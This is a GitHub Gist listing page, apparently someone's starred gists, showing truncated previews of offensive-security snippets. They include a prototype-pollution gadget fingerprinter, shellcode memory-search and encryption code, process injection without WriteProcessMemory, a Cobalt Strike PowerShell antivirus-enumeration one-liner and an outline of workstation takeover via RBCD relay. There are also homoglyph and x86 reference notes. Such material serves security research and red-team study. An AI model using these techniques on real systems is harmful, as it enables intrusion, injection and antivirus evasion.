Skip to content

Instantly share code, notes, and snippets.

View klezVirus's full-sized avatar

klezVirus

1.4k followers · 33 following
View GitHub Profile
@renniepak
renniepak / fingerprint.js
Created December 2, 2021 12:30
Script to fingerprint Script Gadgets to use to exploit Prototype Pollution. Updated version. Original Creator: Nikita Stupin @_nikitastupin
(() => {
let gadgets = [];
if (typeof _satellite !== 'undefined') {
gadgets.push('Adobe Dynamic Tag Management');
}
if (typeof BOOMR !== 'undefined') {
gadgets.push('Akamai Boomerang');
}
@aaaddress1
aaaddress1 / memBruteforce.cpp
Last active February 20, 2024 11:16
Windows 32-bit Shellcode Design without TEB & fs:30h
// memBruteforce.cpp by [email protected]
// brute search loaded moudules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
int retv;
__asm {
@jackullrich
jackullrich / mainc.c
Last active May 23, 2025 21:29
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
@nullenc0de
nullenc0de / apk_params.txt
Last active March 23, 2022 20:49
MD
TermUrl
a
adjust_campaign
alternatives
amount
app
app_id
appname
avoid
@MHaggis
MHaggis / conti.cna
Created August 9, 2021 14:15
#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!
#Long ass one-liner :)
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE)
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@NtRaiseHardError
NtRaiseHardError / imagine-needing-writeprocessmemory-and-createremotethread.c
Last active November 8, 2024 23:03
Process injection without WriteProcessMemory or CreateRemoteThread/QueueUserApc
#include <Windows.h>
// example shellcode
// make sure to have 8 reserved bytes for 64-bit ret
// gadget to rop into the actual shellcode
CHAR shellcode[] = {
// 8 bytes here for jmp loop gadget
0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA,
// actual shellcode starts here
0xEB, 0xFE, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAA,
@StevenACoffman
StevenACoffman / Homoglyphs.md
Last active October 16, 2025 23:35
Unicode Look-alikes

Unicode Character Look-Alikes

Original Letter Look-Alike(s)
a а ạ ą ä à á ą
c с ƈ ċ
d ԁ ɗ
e е ẹ ė é è
g ġ
h һ
@dumpmycode
dumpmycode / MASM notes
Last active April 9, 2023 19:51
==============================================================================================
FLAGS - Visual Studio
| Overflow | OV | 1 = Overflow | 0 = No Overflow
| Direction | UP | 1 = Down | 0 = Up
| Interrupt | EI | 1 = Enabled | 0 = Disabled
| Sign | PL | 1 = Negative | 0 = Positive
| Zero | ZR | 1 = Zero | 0 = Not Zero
| Auxiliary | AC |
| Parity | PE | 1 = Even | 0 = Odd
| Carry | CY | 1 = Carry | 0 = No Carry
@seanjensengrey
seanjensengrey / octal_x86.txt
Last active July 9, 2025 04:26
x86 is an octal machine
# source:http://geocities.com/SiliconValley/heights/7052/opcode.txt
From: [email protected] (Mark Hopkins)
Newsgroups: alt.lang.asm
Subject: A Summary of the 80486 Opcodes and Instructions
(1) The 80x86 is an Octal Machine
This is a follow-up and revision of an article posted in alt.lang.asm on
7-5-92 concerning the 80x86 instruction encoding.
The only proper way to understand 80x86 coding is to realize that ALL 80x86